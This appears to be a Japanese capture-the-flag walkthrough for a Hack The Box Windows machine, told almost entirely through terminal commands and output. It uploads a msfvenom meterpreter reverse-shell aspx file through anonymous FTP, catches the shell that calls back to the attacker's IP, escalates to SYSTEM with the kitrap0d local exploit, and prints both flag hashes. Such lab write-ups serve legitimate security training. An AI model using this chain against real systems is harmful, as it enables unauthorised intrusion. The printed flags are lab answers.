FTPとHTTPが公開されている
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | # nmap -A -n -F -T5 devel.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 07:44 UTC Nmap scan report for devel.htb (10.10.10.5) Host is up (0.044s latency). Not shown: 98 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM <DIR> aspnet_client | 03-17-17 05:37PM 689 iisstart.htm |_03-17-17 05:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 |
FTPアクセスしてみると、ドキュメントルートが公開されている
リバースシェルを取得するaspxファイルを設置する
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=1234 -f aspx > reverse.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 341 bytes Final size of aspx file: 2788 bytes # ftp devel.htb Connected to devel.htb. 220 Microsoft FTP Service Name (devel.htb:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> passive Passive mode on. ftp> put reverse.aspx local: reverse.aspx remote: reverse.aspx 227 Entering Passive Mode (10,10,10,5,192,10). 125 Data connection already open; Transfer starting. 226 Transfer complete. 2824 bytes sent in 0.00 secs (5.7918 MB/s) |
リバースシェルを受け付けるが、ユーザフォルダにはアクセスできない
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | # msfconsole msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 10.10.14.13 LHOST => 10.10.14.13 msf5 exploit(multi/handler) > set LPORT 1234 LPORT => 1234 msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 0.0.0.0:1234 [*] Sending stage (176195 bytes) to 172.17.0.1 [*] Meterpreter session 1 opened (172.17.0.2:1234 -> 172.17.0.1:37972) at 2020-08-10 14:42:31 +0000 meterpreter > getuid Server username: IIS APPPOOL\Web meterpreter > shell Process 3828 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami whoami iis apppool\web c:\windows\system32\inetsrv>cd c:\Users cd c:\Users c:\Users>cd babis cd babis Access is denied. |
local_exploit_suggesterを利用して脆弱性を探す
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | meterpreter > bg [*] Backgrounding session 1... msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_exploit_suggester) > set session 1 session => 1 msf5 post(multi/recon/local_exploit_suggester) > exploit [*] 10.10.10.5 - Collecting local exploits for x86/windows... [*] 10.10.10.5 - 34 exploit checks are being tried... [+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. nil versions are discouraged and will be deprecated in Rubygems 4 [+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed |
ms10_015_kitrap0dを使って攻略する
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.13 LHOST => 10.10.14.13 msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1 SESSION => 1 msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit [-] Handler failed to bind to 10.10.14.13:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [*] Launching notepad to host the exploit... [+] Process 4020 launched. [*] Reflectively injecting the exploit DLL into 4020... [*] Injecting exploit into 4020 ... [*] Exploit injected. Injecting payload into 4020... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (176195 bytes) to 172.17.0.1 [*] Meterpreter session 3 opened (172.17.0.2:4444 -> 172.17.0.1:42604) at 2020-08-10 15:19:11 +0000 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > shell Process 596 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>cd c:\Users cd c:\Users c:\Users>type babis\Desktop\user.txt.txt type babis\Desktop\user.txt.txt 9ecdd6a3aedf24b41562fea70f4cb3e8 c:\Users>type administrator\Desktop\root.txt type administrator\Desktop\root.txt The system cannot find the file specified. c:\Users>type administrator\Desktop\root.txt.txt type administrator\Desktop\root.txt.txt e621a0b5041708797c4fc4728bc72b4b |